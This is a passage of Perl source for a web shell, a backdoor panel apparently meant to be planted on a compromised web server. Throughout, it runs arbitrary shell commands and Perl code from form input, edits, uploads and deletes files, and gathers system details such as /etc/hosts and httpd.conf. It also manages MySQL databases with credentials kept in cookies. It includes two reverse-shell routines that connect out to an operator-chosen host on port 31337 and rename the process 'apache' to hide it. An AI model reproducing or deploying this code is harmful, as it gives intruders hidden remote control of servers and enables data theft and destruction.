3500){$h.=$RunCommand."ussr"}else{$h=$RunCommand."ussr"}@last=split(/ussr/,$h);$h=ah $h;print < < END;
  38. < script >function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("last_command","$h","","/");< /script >
  39. END
  40. }sub ExecuteCommand1{if($RunCommand=~ m/^\s*cd\s+(.+)/gis){if(!-r $1){$CurrentDir=~s!\Q//!/!g;$RunCommand="Can't read $1!";chop($CurrentDir=`\n$Command`)}else{$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`)}&PrintPageHeader("c");print "< h1 >Console:< /h1 >$div";$Prompt = $WinNT ? "$OldDir > " : "[$ServerName $OldDir]\$ ";print "< textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly >$Prompt $RunCommand\n< /textarea >";}else{&PrintPageHeader("c");&history;print "< h1 >Console:< /h1 >$div";$Prompt = $WinNT ? "$CurrentDir > " : "[$ServerName $CurrentDir]\$ ";print "< textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly >$Prompt $RunCommand\n";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(< CommandOutput >){$_=~s/(\n|\r\n)$//;print "$_\n";}$|=0;print "< /textarea >"}else{print "< textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly >< pre >";print `$Command`;print "< /textarea >"}if(!$WinNT){alarm(0);}print "< /pre >";}ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $path=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;if($RunCommand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makefile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$RunCommand="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq "unzip"){$RunCommand="tar xfz ".$UnZipArch;}elsif($RunCommand eq "delfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$RunCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my $tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunCommand eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $path $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttempt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ //g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al.".".$ar;$RunCommand="touch -t $ttempt $path";}if($RunCommand=~m/^\s*cd\s+(.+)/){$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeader("c");file_header();print "< font size=1 >";$Prompt=$WinNT?"$OldDir > " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");file_header();print "< font size=1 >";$Prompt=$WinNT?"$CurrentDir > " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand< pre >";$Command="cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(< CommandOutput >){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "< /pre >";}print "< /font >";&PrintCommandLineInputForm;&PrintPageFooter;}sub SendFileToBrowser($){open (FILE, $_[0]);local ($/);$file=< FILE >;close (FILE);($f=$_[0])=~m!([^/^\\]*)$!;print "Content-type: application/x-unknown\n";print "Content-Disposition: attachment;filename=".$1."\n";print "Content-Description: File to download\n\n";print $file;}sub SystemInfo{sub langs{$s="which gcc perl python php tar zip";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd{$s="df -h";$s.=" -U $q{u}"if($q{u});return $s;}sub hdd1{$s="mount";$s.=" -U $q{u}"if($q{u});return $s;}sub perlv{$s="perl -v";$s.=" -U $q{u}"if($q{u});return $s;}sub phpv{$s="php -v";$s.=" -U $q{u}"if($q{u});return $s;}sub hosts{$s="cat /etc/hosts";$s.=" -U $q{u}"if($q{u});return $s;}sub downloaders{$s="which lynx links wget GET fetch curl";$s.=" -U $q{u}"if($q{u});return $s;}sub httpd{$s="locate httpd.conf";$s.=" -U $q{u}"if($q{u});return $s;}$langs=langs();$httpd=httpd();$hdd1=hdd1();$hdd=hdd();$perlv=perlv();$phpv=phpv();$hosts=hosts();$downloaders=downloaders();&PrintPageHeader("c");print "< h1 >System information< /h1 >";print "$div1$tab< tr >< td >< span >OS version:< /span >$div1";P(`cat /proc/version`);print "$dive< /td >< /tr >< tr >< td >< span >Distr name:< /span >$div1";P(`lsb_release -a`);print "$dive< /td >< /tr >< td >< span >HDD[mount]:< /span >$div1";P(`$hdd1`);print "$dive< /td >< td >< span >HDD[df -h]:< /span >$div1";P(`$hdd`);print "< tr >< td >< span >PATHS:< /span >$div1";P(`$langs`);print "$dive< /td >< td >< span >DOWNLOADERS:< /span >$div1";P(`$downloaders`);print "$dive< /td >< /tr >< tr >< td >< span >PERL version:< /span >$div1";P(`$perlv`);print "$dive< /td >< td >< span >PHP version:< /span >$div1";P(`$phpv`);print "$dive< /td >< /tr >< tr >< td >< span >/etc/hosts:< /span >$div1";P(`$hosts`);print "$dive< /td >< td >< span >httpd.conf:< /span >$div1";P(`$httpd`);print "$dive< /td >< /tr >$tabe$dive";&PrintPageFooter;}sub sql_loginform{print "< h1 >DataBases manager< /h1 >";&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};if(!$hhost){$hhost='localhost'};if(!$pport){$pport='3306'};if(!$usser){$usser='root'};print < < END;
  41. < form name='sf' method='post' >< table cellpadding='2' cellspacing='0' >< tr >< td >Type< /td >< td >Host< /td >< td >Port< /td >< td >Login< /td >< td >Password< /td >< td >Database< /td >< td >< /td >< /tr >< tr >< td >< select name='type' id='nname' >< option value='mysql' selected >MySql< /option >< option value='pgsql' >PostgreSql< /option >< /select >< /td >< td >< input type=text name=sql_host value=$hhost >< /td >< td >< input type=text name=sql_port value=$pport >< /td >< td >< input type=text name=sql_login value=$usser >< /td >< td >< input type=text name=sql_pass value=$passs >< /td >< td >< input type=text name=sql_db value=$dbb >< /td >< input type="hidden" name="d" value="$CurrentDir" >< input type="hidden" name="a" value="sql_connect" >< td >< input type=submit value=' > >' >< /td >< /tr >$tabe< /form >< br >< script >document.getElementById('nname').focus();< /script >
  42. END
  43. }sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form();&PrintVar;&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'};$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'};$dbb=$in{'sql_db'};}sub sql_query_form{ print < < END;
  44. $tab< td >< span >Current query:< /span >< /td >< td >< form name='querys' method='post' >< textarea name='query' cols=70 style='width:100%;height:60px' >$zapros< /textarea >< br/ >< input type=submit value='Query' >< input type="hidden" name="d" value="$CurrentDir" >< input type="hidden" name="a" value="sql_query" >< /form >< /td >$tabe$tabe
  45. END
  46. }sub sql_cq_form{print < < END;
  47. $tab< td >< span >Get data from columns:< /span >< /td >< td >< form name='cquerys' method='post' >< textarea name='cquery' id='cquery' cols=40 style='width:100%;height:60px' >< /textarea >< br/ >< input type="hidden" name="a" value="sql_query" >< input type="hidden" name="d" value="$CurrentDir" >< input type=submit value='Query' >< /form >< /td >
  48. END
  49. }sub sql_databases_form{print '< tr >< form method=post name=dd'.$$ref[0].' >< input type="hidden" name="a" value="sql_databases" >< input type=hidden name=database value='.$$ref[0].' >< input type="hidden" name="d" value="'.$CurrentDir.'" >< td >< /font >< font face="Verdana" size="1" >['.$s4et.']< /font >< /td >< td >< a href="javascript:document.dd'.$$ref[0].'.submit()" >< font face="Verdana" size="1" >'.' '.$$ref[0].'< /font >< /a >< /td >< /form >< /tr >';}sub sql_tables_form {print '< tr >< form method=post name=tt'.$$ref[0].' >< input type="hidden" name="a" value="sql_tables" >< input type=hidden name=table value='.$$ref[0].' >< input type="hidden" name="d" value="'.$CurrentDir.'" >< td >< /font >< font face="Verdana" size="1" >['.$s4et.']< /font >< /td >< td >< a href="javascript:document.tt'.$$ref[0].'.submit()" >< font face="Verdana" size="1" >'.' '.$$ref[0].'< /font >< /a >< /td >< /form >< /tr >';}sub sql_columns_form{print '< script >function lol'.$s4et.'(f){if(f.checked){var cn=document.getElementById("cquery").value;if(cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{document.cquerys.cquery.value=f.id;}}else{exit;}}< /script >< tr >< form method=post name=cc'.$$ref[0].' >< input type="hidden" name="a" value="sql_columns" >< input type=hidden name=column value='.$$ref[0].' >< input type="hidden" name="d" value="'.$CurrentDir.'" >';print '< td >< /font >< font face="Verdana" size="1" >['.$s4et.']< /font >< /td >< td >< input type=checkbox id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.form.c'.$$ref[0].')" >< /td >< td >< a href="javascript:document.cc'.$$ref[0].'.submit()" >< font face="Verdana" size="1" >'.$$ref[0].'< /font >< /a >< /td >< /form >< tr >';}sub sql_data_form {print '< tr >< form method=post name=dt'.$$ref[0].' >< input type="hidden" name="d" value="'.$CurrentDir.'" >< td >'.$verd.'['.$s4et.'] < /font >< /td >< td >'.$verd.$$ref[0].'< /font >< /td >< /form >< /tr >';}sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPageFooter;}sub NetForm {$rip = $ENV{'REMOTE_ADDR'};print < < END;
  50. < h1 >Back-connect< /h1 >$div< form name='nfp' method=post >< span >/bin/sh no tty< /span >< br >Server: < input type='text' name='server' value=$rip > Port: < input type='text' name='ppport' value=31337 >< input type="hidden" name="a" value="net_go" >< input type=submit value=' > >' >< /form >< /div >
  51. $div< form name='nfp' method=post >< span >/bin/bash with tty< /span >< br >Server: < input type='text' name='server' value=$rip > Port: < input type='text' name='ppport' value=31337 >< input type="hidden" name="a" value="net_go1" >< input type=submit value=' > >' >< /form >< /div >
  52. END
  53. &PrintVar;}sub back{$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname("tcp");socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, " >&SOCKET");open(STDOUT, " >&SOCKET");open(STDERR, " >&SOCKET");system("/bin/sh -i");close(STDIN);close(STDOUT);close(STDERR);}sub back1{use Fcntl;my $TIOCGPTN=-2147199952;my $TIOCSPTLCK=1074025521;my $EAGAIN=11;my $HOST=$target;my $PORT=$port;$0="apache";my $sock=new IO::Socket::INET(PeerAddr= >$HOST,PeerPort= >$PORT,Proto= >'tcp',Blocking= >0);sysopen(PTMX,'/dev/ptmx',O_RDWR|O_NONBLOCK);my $tmp='';ioctl(PTMX,$TIOCGPTN,$tmp);my $pts=unpack('i',$tmp);my $unlock=pack('i',0);ioctl(PTMX,$TIOCSPTLCK,$unlock);chdir '/';open STDIN,'/dev/null';umask 0;defined(my $pid=fork);exit if $pid;defined($pid=fork);if(!$pid){exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or exec("/bin/bash < /dev/pts/$pts  >/dev/pts/$pts 2 >/dev/pts/$pts");exit;}open STDOUT,' > >/dev/null';open STDERR, ' > >/dev/null';my $pp=PTMX;$rin=$win=$ein='';vec($rin,fileno($pp),1)=1;vec($rin,fileno($sock),1)=1;select $sock;$|=1;select PTMX;$|=1;select STDOUT;$|=1;my $finished=0;sub forwarddata{my($from,$to)=@_;while(1){my $rv=sysread($from,$buff,1024);last if(!defined($rv)&& $!==$EAGAIN);defined($rv);if ($rv==0){$finished=1;last;}while(length $buff >0){$rv=syswrite($to,$buff,length $buff);if(!defined($rv)&&$!==$EAGAIN){next;}defined($rv);last if($rv==length $buff);substr($buff,0,$rv)='';}}}while(!$finished){my $nfound=select($rout=$rin,$wout=$win,$eout=$ein,undef);die $! if($nfound==-1);forwarddata($pp,$sock);last if $finished;forwarddata($sock,$pp);last if $finished;}close PTMX;close $sock;$wout=$eout.$wout.$rout;}sub NetGo{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'};NetForm();back();&PrintPageFooter;}sub NetGo1{&PrintPageHeader("c");$target=$in{'server'};$port=$in{'ppport'};NetForm();back1();&PrintPageFooter;}sub EvalCodePrint{&PrintPageHeader("p");EvalCodeForm();&PrintPageFooter;}sub EvalCodeForm{print < < END;
  54. < h1 >Execution PERL-code< /h1 >< form name=pf method=post >< textarea name=code class=bigarea id=PerlCode >< /textarea >< input type="hidden" name="a" value="eval_code" >< input type=submit value=Eval style="margin-top:5px" >
  55. END
  56. }sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode=$in{'code'};print "< br >Result:< br >";eval $ccode;&PrintPageFooter;}sub EditFilePathForm {print < < END;
  57. < code >< br >< form name=pfsd method=post >$Prompt< input type="text" name=path id=edit1_file >< input type="hidden" name="a" value="edit_file_path" >< input type="hidden" name="d" value="$CurrentDir" >< input type=submit value=MakeDir >< /form >< /code >
  58. END
  59. }sub EditFilePath{$fpath="";$fpath=$CurrentDir."/".$ViewF;EditFilePrint();}sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPageFooter;}sub EditFileForm{open(FILE, $fpath);@file=< FILE >;$fccodde=HtmlSpecialChars(join('', @file));print '< h1 >File tools:< /h1 >';&RTP_EDIT;print < < END;
  60. < div class=content >< form name=pf11 method=post >< textarea name=ccode class=bigarea id=editfile >$fccodde< /textarea >< input type="hidden" name="a" value="edit_file" >< input type=hidden name=path value=$fpath >< input type="hidden" name="d" value="$CurrentDir" >< input type=submit value=Save style="margin-top:5px" >< /form >< /div >
  61. END
  62. &PrintVar;&PrintPageFooter;}sub ViewFile{$fpath=$CurrentDir."/".$ViewF;&PrintPageHeader("c");open(FILE,$fpath);@file=< FILE >;$fccodde=join('',@file);$fccodde=HtmlSpecialChars($fccodde);print '< h1 >File tools:< /h1 >';&RTP_EDIT;print decode_base64("PHNjcmlwdD5mdW5jdGlvbiBjb2xvcihjb2RlKXt2YXIgcz1bXTt2YXIgYz0iJyI7cmV0dXJuIGNvZGUucmVwbGFjZSgvXGIoY2FzZXxjYXRjaHxjb250aW51ZXxkb3xlbmRkb3xlbHNlfGVsaWZ8ZWxzZWlmfGlmZGVmfGlmbmRlZnxlbmRpZnxmb3J8Zm9yZWFjaHxpZnxmaXxzd2l0Y2h8dHJ5fHR5cGVvZnx3aGlsZXx3aXRofGJyZWFrfGluY2x1ZGV8cmVxdWlyZXxyZXF1aXJlX29uY2V8Zm9wZW58ZnB1dHN8ZnJlYWR8ZmlsZV9nZXRfY29udGVudHN8ZmlsZV9wdXRfY29udGVudHN8cHJlZ19yZXBsYWNlfGltcG9ydHxleGNlcHR8ZGVmaW5lfGRlZmluZWR8dW5kZWYpXGIvZ2ltLCc8c3Bhbj4kMTwvc3Bhbj4nKS5yZXBsYWNlKC8oe3x9KS9naW0sJzxzcGFuPiQxPC9zcGFuPicpLnJlcGxhY2UoL1xiKGZ1bmN0aW9ufHN1YnxkZWZ8dm9pZHxpbnR8cmV0dXJufGV2YWx8YXNzZXJ0fGV4ZWNsfGV4ZWN2fGV4ZWN2ZXxleGVjfGV4ZWNwfGRpZVwoXCkpXGIvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jMDBmZmZmPiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC9cYihzdHJ1Y3R8ZXhpdHxjbGFzc3xzeXN0ZW18cHJpbnR8cHJpbnRmfGVjaG98c3ByaW50ZnxmcHJpbnRmfHZhclxzKVxiL2dpbSwnPGI+JDE8L2I+JykucmVwbGFjZSgvXGIoMHhbXGRhLXpdK3xcZCspXGIvZ2ltLCAnPGZvbnQgY29sb3I9I2ZmYTA3YT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXFx4W1xkYS16XSopL2dpbSwgJzxmb250IGNvbG9yPSNmZmEwN2E+JDE8L2ZvbnQ+JykucmVwbGFjZSgvXGIoaHR0cFw6XC9cLypcLz98aHR0cHNcOlwvXC8qXC8/fGZ0cFw6XC9cLypcLz8pXGIvZ2ltLCc8dT48Zm9udCBjb2xvcj0jZmFmYWQyPiQxPC91PjwvZm9udD4nKS5yZXBsYWNlKC8oIi4qPyJ8Jy4qPycpL2csJzxmb250IGNvbG9yPSNmYWZhZDI+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCouKlwqXC98XC9cLy4qKS9naW0sJzxmb250IGNvbG9yPSM2OTY5Njk+JDE8L2ZvbnQ+JykucmVwbGFjZSgvKFwvXCpbXHNcU10qP1wqXC8pL2dpbSwnPGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD4nKS5yZXBsYWNlKC8oXiMuKiQpL2dpbSwnPGI+PGZvbnQgY29sb3I9IzY5Njk2OT4kMTwvZm9udD48L2I+JykucmVwbGFjZSgvKFwkW19hLXowLTldKikvZ2ltLCc8Yj48Zm9udCBjb2xvcj0jOThmYjk4PiQxPC9mb250PjwvYj4nKS5yZXBsYWNlKC88cihcZCspPi9naW0sZnVuY3Rpb24obWF0Y2gsaWQpe3ZhciByPXNbaWQtMV07dmFyIGNzcz1yLm1hdGNoKC9eKFwvXC98XC9cKnwtKS8pPydjb21tZW50JzpyLm1hdGNoKC9eWyYnXS8pPydzdHJpbmcnOidyZWdleHAnO3JldHVybiAnPHNwYW4gY2xhc3M9IicrY3NzKyciPicrcisnPC9zcGFuPic7fSl9O2Z1bmN0aW9uIGNoYW5nZVRleHQoKXt2YXIgYT1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY2Njb2RlZScpLmlubmVySFRNTDthPWNvbG9yKGEpO2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjY2NvZGVlJykuaW5uZXJIVE1MPWE7fTwvc2NyaXB0Pg==");
  63. print"< div class=content >< pre class=ml1 id='cccodee' >$fccodde< /pre >< /div >";&PrintVar;&PrintPageFooter;}sub HEXDUMP{$fpath=$CurrentDir."/".$ViewF;&PrintPageHeader("c");$fccodde=`hexdump -C $fpath`;$fccodde=HtmlSpecialChars($fccodde);print '< h1 >File tools:< /h1 >';&RTP_EDIT;print"< div class=content >< pre class=ml1 id='cccodee' >$fccodde< /pre >< /div >";&PrintVar;&PrintPageFooter;}sub EditFile {&PrintPageHeader("c");$fccode=$in{'ccode'};$ffpath=$in{"path"};print < < END;
  64. < h1 >File: $ffpath saved< /h1 >< form name=pf11 method=post >< textarea name=ccode class=bigarea id=editfile >$fccode< /textarea >< input type="hidden" name="a" value="filemanager" >< niput type=hidden name=path value=$ffpath >< input type="hidden" name="ddd" value="$ViewF" >< input type="hidden" name="d" value="$CurrentDir" >< input type=submit value=Files style="margin-top:5px" >< /form >
  65. END
  66. open(FFF," > $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF);&PrintVar;&PrintPageFooter;}sub jquery{print '< script >document.querys.query.value="'.$zapros.'";< /script >';}sub sql_columns{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$in{'column'};print < < END;
  67. < script >function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("column","$column","","/");< /script >
  68. END
  69. print "$tbb$verd";$dbh=DBI- >connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh- >prepare("SHOW DATABASES");$sth- >execute;print "< b >DATABASES:< /b >< br >< td >< table border=1 cellspacing=0 cellpadding=1 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth- >finish;print "$tabe< /td >< td >$tab< td >";$zapros="SHOW TABLES FROM $dbb";sql_cq_form();print "< /td >< td >";sql_query_form();print "$tabe< /td >$tabe";$s4et=0;$sth=$dbh- >prepare($zapros);$sth- >execute;print $tabe;print "< b >Tables from $dbb:< /b >< br >< table border=1 cellspacing=0 cellpadding=1 cols=4 >< td >< table border=1 cellspacing=0 cellpadding=1 cols=2 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth- >finish;print "$tabe< /td >< td >< table border=1 cellspacing=0 cellpadding=1 cols=2 >";$s4et=0;$sth=$dbh- >prepare("show columns from $table from $dbb");$sth- >execute;while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth- >finish;print "$tabe< /td >";$s4et=0;$zapros="SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0,30";jquery();$sth=$dbh- >prepare($zapros);$sth- >execute;print "< td >< table border=1 cellspacing=0 cellpadding=1 cols=2 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_data_form();}$rc=$sth- >finish;$rc=$dbh- >disconnect;print "$tabe< /td >$tabe";&PrintPageFooter;}sub sql_tables{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qqquery=$in{'table'};print < < END;
  70. < script >function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("table","$qqquery","","/");< /script >
  71. END
  72. print "$tbb$verd";$dbh=DBI- >connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh- >prepare('SHOW DATABASES');$sth- >execute;print "< b >DATABASES:< /b >< br >< td >< table border=1 cellspacing=0 cellpadding=1 >";jquery();while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth- >finish;print "$tabe< /td >< td >$tab< td >";sql_cq_form();print "< /td >< td >";sql_query_form();print "< /td >$tabe< /td >$tabe";$s4et=0;$sth=$dbh- >prepare("SHOW TABLES FROM $dbb");$sth- >execute;print "< b >Tables from $dbb:< /b >< br >< table border=1 cellspacing=0 cellpadding=1 cols=4 >< td >< table border=1 cellspacing=0 cellpadding=1 cols=2 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth- >finish;print "$tabe< /td >< td >< table border=1 cellspacing=0 cellpadding=1 cols=2 >";$s4et=0;$zapros="SHOW COLUMNS FROM `$qqquery` FROM `$dbb`";jquery();$sth=$dbh- >prepare($zapros);$sth- >execute;while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth- >finish;$rc=$dbh- >disconnect;print "$tabe< /td >$tabe";&PrintPageFooter;}sub sql_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_loginform();$ddb=$in{'database'};print < < END;
  73. < script >function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("dbb","$ddb","","/");< /script >
  74. END
  75. print "$tbb$verd";$dbh=DBI- >connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh- >prepare("SHOW DATABASES");$sth- >execute;print "< b >DATABASES:< /b >< br >< td >< table border=1 cellspacing=0 cellpadding=1 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth- >finish;print "$tabe< /td >< td >$tbb >";sql_query_form();print "$tabe< /td >$tabe";$s4et=0;$zapros="SHOW TABLES FROM `$ddb`";jquery();$sth=$dbh- >prepare($zapros);$sth- >execute;print "$tabe";print "< b >Tables from $ddb:< /b >< br >";print "< table border=1 cellspacing=0 cellpadding=1 cols=10 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_tables_form();}$s4et=0;$rc=$sth- >finish;$rc=$dbh- >disconnect;print "$tabe";&PrintVar;&PrintPageFooter;}sub sql_set_cookie{print "Set-Cookie: hhost=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Cookie: dbb=$dbb;\n";}sub sql_query{sql_vars_set();&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cquery'};if($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.`$table` LIMIT 0,30";}else{$qquery=$in{'query'};}$dbh=DBI- >connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh- >prepare("SHOW DATABASES");$sth- >execute;print "$verd< table width=100% cellspacing=0 cellpadding=1 cols=2 >< b >DATABASES:< /b >< td >< table border=1 cellspacing=0 cellpadding=1 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth- >finish;print "$tabe< /td >< td >$tbb >";sql_query_form();print "$tabe< /td >$tabe";$s4et=0;$sth=$dbh- >prepare($qquery);$sth- >execute;print "< b >Results:< /b >< br >";print "< table border=1 cellspacing=0 cellpadding=1 cols=10 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;print "< tr >< td >$verd [$s4et]< /font >< /td >< td >".$verd.$$ref[0]."< /font >< /td >< /tr >";}$s4et=0;$rc=$sth- >finish;$rc=$dbh- >disconnect;print "$tabe";print '< script >document.querys.query.value="'.$qquery.'";< /script >';&PrintVar;&PrintPageFooter;}sub sql_connect{sql_vars_set();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_set();$s4et=0;$dbb="";$dbh=DBI- >connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros="SHOW DATABASES";jquery();$sth=$dbh- >prepare($zapros);$sth- >execute;print "$verd $tbb< b >DATABASES:< /b >< td >< table border=1 cellspacing=0 cellpadding=1 >";while($ref=$sth- >fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth- >finish;print "$tabe< /td >< td >";sql_query_form();print "< /td >$tabe";$rc = $dbh- >disconnect;print '< /font >';return;}print "Some error...< /font >";&PrintVar;&PrintPageFooter;}sub UploadFile{if($TransferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageHeader("c");file_header();print "< font size=1 >Uploading $TransferFile to $CurrentDir...< br >";chop($TargetName) if($TargetName = $CurrentDir) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathSep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, " >$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'filedata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.< br >";print "File Path: $TargetName< br >";}else{print "Failed: $!< br >";}print "< /font >";&PrintCommandLineInputForm;&PrintPageFooter;}sub Remove{use Cwd qw(abs_path);my $path=abs_path($0);system("rm $path");}&ReadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$RunCommand2=$in{'l11'};if($RunCommand2){$RunCommand=$RunCommand2}$RunCommand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$RunCommand2=$in{'group'};if($RunCommand2){$gr=$Cookies{'f'};$gre='';$gr=~s/\%([A-Fa-f0-9]{2})/pack('C',hex($1))/seg;@grr=split(/\s/,$gr);if($RunCommand2 eq "untar"){foreach $arg(@grr){if($arg ne '..'){$gre.="tar xfz $arg;"}}}if($RunCommand2 eq "tar"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="tar cfz z_$$.tar.gz".$arg1;}if($RunCommand2 eq "delete"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="rm -rf$arg1";}$RunCommand=$gre;}$ChangeDir=$in{'cc'};$ZipFile=$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$DelFile=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'mf'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}elsif($Action eq "view_file"){&ViewFile;}elsif($Action eq 